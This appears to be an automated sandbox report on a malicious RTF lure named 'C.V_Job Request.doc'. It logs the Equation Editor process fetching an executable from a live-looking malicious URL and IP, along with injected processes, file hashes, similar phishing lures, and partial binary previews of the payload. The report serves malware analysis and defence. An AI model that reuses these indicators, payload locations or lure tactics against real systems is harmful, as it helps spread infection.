            NameMaliciousAntivirus DetectionReputation
            http://binatonezx.tk/seasonzx.exetrue
            • Avira URL Cloud: malware
            		unknown
            www.agentpathleurre.space/s18y/true
            • Avira URL Cloud: safe
            		low

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://www.windows.com/pctv.explorer.exe, 00000006.00000000.441403687.0000000002AE0000.00000002.00020000.sdmpfalse
              		high
              http://investor.msn.comexplorer.exe, 00000006.00000000.441403687.0000000002AE0000.00000002.00020000.sdmpfalse
                		high
                http://www.msnbc.com/news/ticker.txtexplorer.exe, 00000006.00000000.441403687.0000000002AE0000.00000002.00020000.sdmpfalse
                  		high
                  http://wellformedweb.org/CommentAPI/explorer.exe, 00000006.00000000.443284470.0000000004650000.00000002.00020000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmpfalse
                    		high
                    http://www.iis.fhg.de/audioPAexplorer.exe, 00000006.00000000.443284470.0000000004650000.00000002.00020000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEMexplorer.exe, 00000006.00000000.510449681.00000000045D6000.00000004.00000001.sdmpfalse
                      		high
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 00000006.00000000.508717181.0000000002CC7000.00000002.00020000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.hotmail.com/oeexplorer.exe, 00000006.00000000.441403687.0000000002AE0000.00000002.00020000.sdmpfalse
                        		high
                        http://treyresearch.netexplorer.exe, 00000006.00000000.443284470.0000000004650000.00000002.00020000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2explorer.exe, 00000006.00000000.449321006.0000000003DF8000.00000004.00000001.sdmpfalse
                          		high
                          http://www.collada.org/2005/11/COLLADASchema9Doneseasonhd72463.exe, 00000004.00000002.424515254.0000000002591000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 00000006.00000000.508717181.0000000002CC7000.00000002.00020000.sdmpfalse
                            		high
                            http://java.sun.comexplorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.icra.org/vocabulary/.explorer.exe, 00000006.00000000.508717181.0000000002CC7000.00000002.00020000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.msn.com/de-de/?ocid=iehp_2P&explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.seasonhd72463.exe, 00000004.00000002.425810745.0000000005060000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.447079678.0000000001BE0000.00000002.00020000.sdmpfalse
                                		high
                                http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000006.00000000.510496452.000000000460B000.00000004.00000001.sdmpfalse
                                  		high
                                  http://investor.msn.com/explorer.exe, 00000006.00000000.441403687.0000000002AE0000.00000002.00020000.sdmpfalse
                                    		high
                                    http://www.msn.com/?ocid=iehpexplorer.exe, 00000006.00000000.430834779.00000000044E7000.00000004.00000001.sdmpfalse
                                      		high
                                      http://www.piriform.com/ccleanerexplorer.exe, 00000006.00000000.430834779.00000000044E7000.00000004.00000001.sdmpfalse
                                        		high
                                        http://computername/printers/printername/.printerexplorer.exe, 00000006.00000000.443284470.0000000004650000.00000002.00020000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		low
                                        http://go.microsoft.cseasonhd72463.exe, 00000004.00000002.423882111.0000000000814000.00000004.00000020.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.%s.comPAseasonhd72463.exe, 00000004.00000002.425810745.0000000005060000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.447079678.0000000001BE0000.00000002.00020000.sdmp, msiexec.exe, 00000007.00000002.679548263.0000000001F70000.00000002.00020000.sdmpfalse
                                        • URL Reputation: safe
                                        		low
                                        http://www.autoitscript.com/autoit3explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmpfalse
                                          		high
                                          http://www.msn.com/de-de/?ocid=iehpT2P&explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmpfalse
                                            		high
                                            https://support.mozilla.orgexplorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmpfalse
                                              		high
                                              http://servername/isapibackend.dllexplorer.exe, 00000006.00000000.509688161.0000000003E50000.00000002.00020000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		low

                                              Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public

                                              IPDomainCountryFlagASNASN NameMalicious
                                              2.56.59.211
                                              		binatonezx.tkNetherlands
                                              		395800GBTCLOUDUStrue

                                              General Information

                                              Joe Sandbox Version:33.0.0 White Diamond
                                              Analysis ID:510259
                                              Start date:27.10.2021
                                              Start time:16:41:26
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 12m 1s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Sample file name:C.V_Job Request.doc
                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                              Number of analysed new started processes analysed:11
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:1
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.expl.evad.winDOC@9/10@2/1
                                              EGA Information:Failed
                                              HDC Information:
                                              • Successful, ratio: 21.6% (good quality ratio 20.9%)
                                              • Quality average: 78.7%
                                              • Quality standard deviation: 25.8%
                                              HCA Information:
                                              • Successful, ratio: 100%
                                              • Number of executed functions: 84
                                              • Number of non-executed functions: 45
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .doc
                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                              • Attach to Office via COM
                                              • Scroll down
                                              • Close Viewer
                                              Warnings:
                                              Show All
                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size getting too big, too many NtCreateFile calls found.
                                              • Report size getting too big, too many NtEnumerateValueKey calls found.
                                              • Report size getting too big, too many NtQueryAttributesFile calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              16:42:19API Interceptor47x Sleep call for process: EQNEDT32.EXE modified
                                              16:42:21API Interceptor74x Sleep call for process: seasonhd72463.exe modified
                                              16:42:45API Interceptor117x Sleep call for process: msiexec.exe modified
                                              16:44:16API Interceptor1x Sleep call for process: explorer.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              2.56.59.211Purchase order.docGet hashmaliciousBrowse
                                              • binatonezx.tk/villarzx.exe
                                              Swift-copy.docGet hashmaliciousBrowse
                                              • binatonezx.tk/obinnazx.exe
                                              RFQ for _RTO system packages product details.docGet hashmaliciousBrowse
                                              • binatonezx.tk/stanzx.exe
                                              Purchase order_122.docGet hashmaliciousBrowse
                                              • binatonezx.tk/catzx.exe
                                              SMC Req Offer.docGet hashmaliciousBrowse
                                              • binatonezx.tk/seasonzx.exe
                                              Original Shipping documents.docGet hashmaliciousBrowse
                                              • binatonezx.tk/villarzx.exe
                                              payment.docGet hashmaliciousBrowse
                                              • binatonezx.tk/davidhillzx.exe
                                              _Payment Advise.docGet hashmaliciousBrowse
                                              • binatonezx.tk/trulexzx.exe
                                              FLOW LINE CONTRACT00939.docGet hashmaliciousBrowse
                                              • binatonezx.tk/asadzx.exe
                                              QUOTE B1018530.docGet hashmaliciousBrowse
                                              • binatonezx.tk/mazx.exe
                                              About company.docGet hashmaliciousBrowse
                                              • binatonezx.tk/gregzx.exe
                                              Purchase order_122.docGet hashmaliciousBrowse
                                              • binatonezx.tk/catzx.exe
                                              PRICE QUOTATION.docGet hashmaliciousBrowse
                                              • binatonezx.tk/seasonzx.exe
                                              PROFORMA INVOICE.doc__.rtfGet hashmaliciousBrowse
                                              • binatonezx.tk/obinnazx.exe
                                              Purchase Order.docGet hashmaliciousBrowse
                                              • binatonezx.tk/villarzx.exe

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              binatonezx.tkPurchase order.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              Swift-copy.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              RFQ for _RTO system packages product details.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              Purchase order_122.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              SMC Req Offer.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              Original Shipping documents.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              payment.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              _Payment Advise.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              FLOW LINE CONTRACT00939.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              QUOTE B1018530.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              About company.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              Purchase order_122.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              PRICE QUOTATION.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              PROFORMA INVOICE.doc__.rtfGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              Purchase Order.docGet hashmaliciousBrowse
                                              • 2.56.59.211

                                              ASN

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              GBTCLOUDUSPurchase order.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              setup_installer.exeGet hashmaliciousBrowse
                                              • 2.56.59.42
                                              Swift-copy.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              jGK42jrs2j.exeGet hashmaliciousBrowse
                                              • 2.56.59.42
                                              DDEEBC8CCCC58E25CE1709B0E9A519B2BD46472E92860.exeGet hashmaliciousBrowse
                                              • 2.56.59.42
                                              p3IJWYfJZw.exeGet hashmaliciousBrowse
                                              • 2.56.59.42
                                              RFQ for _RTO system packages product details.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              Purchase order_122.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              SMC Req Offer.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              Original Shipping documents.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              6FD5C640F4C1E434978FDC59A8EC191134B7155217C84.exeGet hashmaliciousBrowse
                                              • 2.56.59.42
                                              setup_x86_x64_install.exeGet hashmaliciousBrowse
                                              • 2.56.59.42
                                              0OeX2BsbUo.exeGet hashmaliciousBrowse
                                              • 2.56.59.42
                                              AB948F038175411DC326A1AAD83DF48D6B65632501551.exeGet hashmaliciousBrowse
                                              • 2.56.59.42
                                              365F984ABE68DDD398D7B749FB0E69B0F29DAF86F0E3E.exeGet hashmaliciousBrowse
                                              • 2.56.59.42
                                              C03C8A4852301C1C54ED27EF130D0DE4CDFB98584ADEF.exeGet hashmaliciousBrowse
                                              • 2.56.59.42
                                              Fri051e1e7444.exeGet hashmaliciousBrowse
                                              • 2.56.59.42
                                              payment.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              _Payment Advise.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              wA5D1yZuTf.exeGet hashmaliciousBrowse
                                              • 2.56.59.42

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\seasonzx[1].exe
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:downloaded
                                              Size (bytes):526336
                                              Entropy (8bit):7.5320170434389455
                                              Encrypted:false
                                              SSDEEP:12288:PG9ImHKQ6MQ0vN3h4Ip/uzEcrPuRj42GT:eJGA3h4Ip/uzrPAbG
                                              MD5:9227463FFB6E37D271919E06D175EDA7
                                              SHA1:549CCA1BD4031F3D302832754A1F3E51FFED065F
                                              SHA-256:5E529CBB901ACED8A6AF49250AFD3D67E059D717D7ECF3EDC32E18A9D549361C
                                              SHA-512:3C2673D5CA3BE9C723B8D34185299459A53F0D99B3F8ABD2821B73299D6DE83257CD4E850AC635C53598EB8CBD9574EE103B781C7C6952B69F2C6EE8C9B3E60B
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 23%
                                              Reputation:low
                                              IE Cache URL:http://binatonezx.tk/seasonzx.exe
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....xa..............0.............>.... ... ....@.. .......................`............@.....................................O.... .......................@....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................ .......H..................t....|..............................................&.(......*...0..H.............s..........~..........(......~.........,.s.............,..(......*........#<.......0.............+..*..0...........s.....+..*..0...........sR....+..*..0...........sT....+..*..0...........s.....+..*..0...........s.....+..*..0...........s.....+..*..0...........s.....+..*...}......}.....(.......r...p}....*z..}......}.....(........}....*...}......}.....(........}......}....*...}.
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4A35DA17-E94D-4691-827C-120A276E213C}.tmp
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:Composite Document File V2 Document, Cannot read section info
                                              Category:dropped
                                              Size (bytes):177152
                                              Entropy (8bit):7.968894553436934
                                              Encrypted:false
                                              SSDEEP:3072:5r+OFkZ8MtvknSS6grNZM3dVeqIoUxnVWWwRJZgaepJWma515A:5x27JkSS6KNZSXVnWSoaKam
                                              MD5:A6222C96BEC0E96BECCD2EF405CBC8C4
                                              SHA1:442B799CBCA7A1D526C31AB2B82C0C3E452AFF23
                                              SHA-256:6F64549B2D015CCA2E0CCDBAAFE166640C004367D2F75B316D7620EEB597083C
                                              SHA-512:3FAADCE5A243020431C5B191ABE03610AECA2AA6271C6E5B040749F5A510FA6BB929F0B722D0D1C2047F2D00F1C319284AC1268659BC22FB5E6F5799C4ED88A9
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Reputation:low
                                              Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................W........................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{7F12DB12-48BF-46DA-B084-D7B910635C9B}.tmp
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1024
                                              Entropy (8bit):0.05390218305374581
                                              Encrypted:false
                                              SSDEEP:3:ol3lYdn:4Wn
                                              MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                              SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                              SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                              SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{99A74BA1-7084-4250-8A29-E85A11395DDC}.tmp
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):13312
                                              Entropy (8bit):3.5864344325374753
                                              Encrypted:false
                                              SSDEEP:384:db9nvMlWW4cPwZY8APS+oX9Y52wBvvTKBkZ:db9nvsgcPwOPUY5HBGBkZ
                                              MD5:99BD4E7DE3940A04A671C43E8132D001
                                              SHA1:8518B09DEDC04133804F6E6F538C83A2FACC0208
                                              SHA-256:FB31FF316F5CD02FA92BB0153268076174D356631D2AF4B8D41F5231720ABEAB
                                              SHA-512:BC6D7FD0AE073CE562A627E0F7C060F4CB1898CDD34F9B53251B3FBC507A132BDEA824E34EE33A8091D95197C5B66FEEE1BA0AF1328F0B0A7AE653CFA11E4633
                                              Malicious:false
                                              Reputation:low
                                              Preview: ).=.7.#.%.&.1.?.0.>.3.`.,.(.?.5.-.7.`.!.9.=.).9...).1.?.$.`.!.].6.?.`.|.`.4.?.%.<.0.....3.#.3.5.4.8.?.-.<.,.8.%.*.+.?.!.9.5.=.2.[.@.3.5.0.'.0.>...9.!.&.-.6.?.3.5.#.4.~./...+.,.=.|.].(.7.5.1.].<.?.%.?.6...].|.6.#.-.].6.^.0...?.~.*.,.9.*.7.6.`.7.8._.?./.$.?.`...%.2.2.9.1.*...~.!.~.....).1.$.'.'.?.>.2..._.).@.?.6.+.>.>.-.5...$.-.?.#.`.5...*.(.1.#.^.|.'.$.?.+.#.&.&.7...|.2.=.?.^.!.#.(...'.^..._...`./.;.).@.`.0.9.|.%.&.|.-.&.9.&.8.'.`...=...).:.>.&.[.[.>...#.).^.%.`.7.3.2.3.`.`.?.].?.4.,.^.6.-.]...?.2.?...$.`.[.-.(.#._.!.].#.?.<.;.-.<.?.~.[.^.%...$.?.?...$.<.%.^.9.6.#.!.@.9.~.&.?.7.).-.^.?._.?.(.8.-.?...?.2.;.|.^.^.|.%.9.?.%._...?.&.].6.[.:...?...#.,.~.:.>...;.%.'.#.+.,._.2.?._.?.*.[.@.&.,.9.)...9.^.>.;./.:.&.$.!.^.4.8...=.).9.'.(.?.?.+.1.1.*.[.8.?.2.+.%.0.>.%...^.0.*.%.~.(.6.~...#.*.:.,.8.<.[.).6.+.1.5.6.$.:._.'.).@...#.!.0...%.].8...6.4.!.`.8...&.8._.#.|.[./...|...9.,.4.?.<.[.9.@.(.3...|.3...;.^.4.`.[.^.1.0.%.:.?.%.:.9.^.|.%.=.[.`.9.?.=.8.(.8.>.`.?.-.?.3...%.?./.,...;.<.(.3.?.2.`.^.?.;.6.
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{BE99F549-07B9-491A-8DB9-68BEA2AC23A8}.tmp
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1536
                                              Entropy (8bit):1.3586208805849453
                                              Encrypted:false
                                              SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbu:IiiiiiiiiifdLloZQc8++lsJe1Mz1/
                                              MD5:3DEAB1D660801EC3E5A2A85121BD0100
                                              SHA1:AA76E24361F626EB979536BF41369287FE7F6444
                                              SHA-256:682A68677DC3D843BDF8F1F3A3CF56B748E35B976F4AD01115619A6CD080BC7D
                                              SHA-512:4F5A6BA6878C88BD08B726EB71FA0C7682E78DC5DA93CE63C33290C8A2F9375CD94FFC2C3BADEF6A04C1AC7CFBE0EFAE7BB945F2D9B1A1BBB60F80F9CB84A072
                                              Malicious:false
                                              Reputation:low
                                              Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\C.V_Job Request.LNK
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:58 2021, mtime=Mon Aug 30 20:08:58 2021, atime=Wed Oct 27 22:42:17 2021, length=445393, window=hide
                                              Category:dropped
                                              Size (bytes):1039
                                              Entropy (8bit):4.5731093684743485
                                              Encrypted:false
                                              SSDEEP:24:8P8G0n/XTuzLIZ+GLNJeGOLzDv3qoE/7Eg:8P8G0n/XTkuNJi6oWB
                                              MD5:66DF0B78A634B21C0034107A4983E87D
                                              SHA1:3FD37B0E445CB40504527400517ECACB0C9EB0FD
                                              SHA-256:5A4483E851FB70C0B2AC567FADD2AFBEDC73F22E1CD83A0B744D8C7C4532C2EF
                                              SHA-512:8FB8421FF12EBC63933F961D0465D2F1A368C9E0569BD34D006C9EF81466BB674F7C49E403DF748EE7B76A3C4E0ECE515D4604CE7E9F7C7ACD80E9878F170472
                                              Malicious:false
                                              Preview: L..................F.... ......?......?....^.F.................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S ...user.8......QK.X.S .*...&=....U...............A.l.b.u.s.....z.1......S!...Desktop.d......QK.X.S!.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....p.2.....[SI. .CV_JOB~1.DOC..T.......S ..S .*.........................C...V._.J.o.b. .R.e.q.u.e.s.t...d.o.c.......}...............-...8...[............?J......C:\Users\..#...................\\715575\Users.user\Desktop\C.V_Job Request.doc.*.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.C...V._.J.o.b. .R.e.q.u.e.s.t...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......715575..........D_....3N...W...9..g..........
                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):81
                                              Entropy (8bit):4.796519991888395
                                              Encrypted:false
                                              SSDEEP:3:bDuMJl+LzBXo2mX1Z8Xo2v:bCBlS+L
                                              MD5:B78115C5999CBD22895610ED925C66F5
                                              SHA1:1EFDA182CFA86793A126100070301C1D1AD4C40C
                                              SHA-256:BEFE43765F3B3397789933ACDC7CAF5C0F3591BC8803A65DA48171831985985F
                                              SHA-512:1412AB4C2A622BFB8BD89DBC36277F6025E7823614C25B6BD5B3305D8B26B5BD9A0CF31913EB70998A1551EE2485DFDA512364765994D84E72CAD11A469AD827
                                              Malicious:false
                                              Preview: [folders]..Templates.LNK=0..C.V_Job Request.LNK=0..[doc]..C.V_Job Request.LNK=0..
                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):162
                                              Entropy (8bit):2.5038355507075254
                                              Encrypted:false
                                              SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                              MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                              SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                              SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                              SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                              Malicious:false
                                              Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                              C:\Users\user\AppData\Roaming\seasonhd72463.exe
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):526336
                                              Entropy (8bit):7.5320170434389455
                                              Encrypted:false
                                              SSDEEP:12288:PG9ImHKQ6MQ0vN3h4Ip/uzEcrPuRj42GT:eJGA3h4Ip/uzrPAbG
                                              MD5:9227463FFB6E37D271919E06D175EDA7
                                              SHA1:549CCA1BD4031F3D302832754A1F3E51FFED065F
                                              SHA-256:5E529CBB901ACED8A6AF49250AFD3D67E059D717D7ECF3EDC32E18A9D549361C
                                              SHA-512:3C2673D5CA3BE9C723B8D34185299459A53F0D99B3F8ABD2821B73299D6DE83257CD4E850AC635C53598EB8CBD9574EE103B781C7C6952B69F2C6EE8C9B3E60B
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 23%
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....xa..............0.............>.... ... ....@.. .......................`............@.....................................O.... .......................@....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................ .......H..................t....|..............................................&.(......*...0..H.............s..........~..........(......~.........,.s.............,..(......*........#<.......0.............+..*..0...........s.....+..*..0...........sR....+..*..0...........sT....+..*..0...........s.....+..*..0...........s.....+..*..0...........s.....+..*..0...........s.....+..*...}......}.....(.......r...p}....*z..}......}.....(........}....*...}......}.....(........}......}....*...}.
                                              C:\Users\user\Desktop\~$V_Job Request.doc
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):162
                                              Entropy (8bit):2.5038355507075254
                                              Encrypted:false
                                              SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                              MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                              SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                              SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                              SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                              Malicious:false
                                              Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                              Static File Info

                                              General

                                              File type:Rich Text Format data, unknown version
                                              Entropy (8bit):4.2248396949078435
                                              TrID:
                                              • Rich Text Format (5005/1) 55.56%
                                              • Rich Text Format (4004/1) 44.44%
                                              File name:C.V_Job Request.doc
                                              File size:445393
                                              MD5:b5be29921304476377e096c60a3fb418
                                              SHA1:653d40c3e86feb11b1cc6b7745257754c296c109
                                              SHA256:fd4e52557f511c596e0d0ff58a1a7775a1295889461b73856d4aa733108e7b58
                                              SHA512:987cb27f1b49978d5dae764d61f4a0af9dff31d073e1d2a28c4d2ac2ee1a9772ef5d337878ca1e7fb18aa8d1f67affcd586336b066afff52ad46ce250de4ff97
                                              SSDEEP:6144:XTaxUCbwi30ctNoGw+JhzjbLq1M4iZsuj36wk7OMwBd6c11ONcwB9sal13uxHGMp:X2xUIwvuoD+nfh44xj06T66ObstGcL
                                              File Content Preview:{\rtf7661)=7#%&1?0>3`,(?5-7`!9=)9.)1?$`!]6?`|`4?%<0..3#3548?-<,8%*+?!95=2[@350'0>.9!&-6?35#4~/.+,=|](751]<?%?6.]|6#-]6^0.?~*,9*76`78_?/$?`.%2291*.~!~..)1$''?>2._)@?6+>>-5.$-?#`5.*(1#^|'$?+#&&7.|2=?^!#(.'^._.`/;)@`09|%&|-&9&8'`.=.):>&[[>.#)^%`7323``?]?4,^6

                                              File Icon

                                              Icon Hash:e4eea2aaa4b4b4a4

                                              Static RTF Info

                                              Objects

                                              IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                              0000018C9hno
                                              10000187Ch2embeddeda175616no

                                              Network Behavior

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Oct 27, 2021 16:42:17.913721085 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:17.943983078 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:17.944142103 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:17.944622040 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:17.980179071 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:17.983454943 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:17.983525991 CEST80491652.56.59.211192.168.2.22
